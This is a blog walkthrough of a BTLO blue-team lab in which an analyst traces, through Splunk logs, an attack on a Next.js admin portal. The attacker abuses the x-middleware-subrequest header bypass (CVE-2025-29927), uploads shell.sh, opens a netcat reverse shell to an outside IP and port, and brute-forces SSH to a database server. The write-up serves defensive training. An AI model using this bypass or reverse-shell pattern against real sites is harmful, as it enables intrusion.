Close Menu
    Cybersecurity 4 Mins ReadNo Comments

    MiddleMayhem Investigation: Chasing a Ghost in the Wires

    Lipson Thomas PhilipBy Updated:39 Views

    John works in the security team at MiddleMayhem Incorporated. The security team detected unusual network traffic to their admin portal. However, no security breaches have been confirmed. John got SIEM logs about the incident from his team. He has to analyze the attack pattern to determine how the attackers bypassed authentication, achieved remote code execution, and moved laterally across the network.

    Lab Information

    DifficultyEasy
    OSLinux
    Points25
    Created ByBTLO

    MiddleMayhem Website

    The Middlemayhem company’s website is already being bookmarked. Now, let’s go check the website.

    middlemayhem-website-1
    1. Framework Information

    If we examine the footer, we can see that the website uses the JavaScript Framework Next.js, 15.0.0.

    Advertisement
    middlemayhem-website-2
    1. Finding Sensitive (Juicy) URL

    While looking through the homepage, we can see multiple URLs in the footer bar of the MiddleMayhem website.

    middlemayhem-footer

    There are three links down there: Sitemaps, Admin, and Robots.

    • The Sitemap is giving a 404 error, which is not what we are looking for.
    • Admin gives you a login portal, which may be helpful for hackers. This is one of the juicy links. This link goes to /login.
    • Only the Robots page is left. While looking for juicy URLs, we found two exciting ones: /admin and /admin/file-upload.
    middlemayhem-robots-txt

    We now have a problem: we need two URLs, but we have three: /login, /admin, and /admin/file-upload.

    There’s a funny catch /admin redirects to /login.

    Advertisement

    The two URLs should be /login and /admin/file-upload.

    Splunk

    Now, we will check the logs through the Splunk SIEM. In the image below, we can see numerous logs.

    middle-mayhem-splunk
    1. Checking malicious IP Address

    Let’s see the IP address from which the connections are made. For that, we have to check the source IP from the side filters.

    middle-mayhem-splunk-ips

    From 172.217.164.174 and 218.92.0.204, a large number of connections have been established.

    We will check both IP Addresses one by one.

    The 172.217.164.174 IP address looks clean.

    middle-mayhem-splunk-172-ip

    Now, it’s time to check the 218.92.0.204 IP Address.

    middle-mayhem-splunk-218-ip

    Here, as we can see, the attacker attempted to upload a Bash shell script named “shell.sh”. This IP is malicious to the company. The 218.92.0.204is the attacker’s IP address.

    1. Checking the number of unique Uniform Resource Identifier (URI)
    host=webapp ip_src=218.92.0.204 | stats dc(http_request_uri)
    middlemayhem-splunk-uri

    The total number of unique URI, we got is 9930.

    1. HTTP Header

    First, we need to read some articles to find some clues. In one of the articles, there’s something mentioned about middleware, just like below the image.

    middlemayhem-header

    Now, we will search in Splunk.

    We search middleware as a query and we got 7 search results.

    Upon reviewing the search results, the first one contains a header mentioned as x-middleware-subrequest.

    1. Attacker access after exploiting the CVE

    For this, we need to focus on the search results within the header “middleware”.

    We will use the filter http_request_uri. There are two URIs available: /admin and /api/upload.

    middlemayhem-http-request-uri

    /api/upload is the URI which we are looking for.

    1. Finding reverse shell
    host=webapp shell

    In the first search result, there’s information about the shell and the NC details of IP and Port number.

    middlemayhem-ip-port

    IP address: 113.89.232.157 and port number: 31337

    1. Lateral movement

    As we know, the MiddleMayhem website has a login portal, which means employees may have login credentials.

    We were looking for a password in the search results. We found the host database server (dbserver) using the SSH login method.

    middlemayhem-lateral-movement

    In lateral movement, an attacker can perform actions such as SSH, bruteforce, RDP, PtT, PtH, and so on.

    The attacker doesn’t have the hash or login credentials. So, PtT, PtH and RDP are eliminated. So, two left: SSH and bruteforce.

    It will likely be an SSH bruteforce attack, as they may not have credentials for SSH login.

    1. Identify the user account

    While looking for lateral movement, we can see the user account name in the same result as below.

    middlemayhem-user-account

    The user account is dbserv.

    Looking For CVE

    Now, as we have the information about the framework, Next JS. We will utilise one of the most effective OSINT tools, Google.

    middlemayhem-looking-cve

    While looking, we got the CVE-2025-29927.

    Conclusion

    MiddleMayhem is more than a simple lab. It’s a tutorial on modern web exploitation, log analysis, and real-time detection. It’s crucial to understand how even a minor header can lead to a breach in today’s rapidly evolving threat landscape.

    MiddleMayhem lab will teach you to think like a defender — quick, analytical, and constantly adapting — regardless of your level of experience as a blue teamer or as a novice SOC analyst.

    Resources

    0 0 votes
    Article Rating
    Share.

    Lipson Thomas Philip is a student of Masters in Network and Information Security at Griffith College, Limerick. He has done an internship in Cyber Cell, Gurugram 2021. His motive is to learn on a daily basis. As somebody said "Never stop learning". You learn new things knowing or unknowingly and as your life changes day by day.

    Related Posts

    Subscribe
    Notify of
    guest

    This site uses Akismet to reduce spam. Learn how your comment data is processed.

    0 Comments
    Oldest
    Newest Most Voted
    Inline Feedbacks
    View all comments
    0
    Would love your thoughts, please comment.x
    ()
    x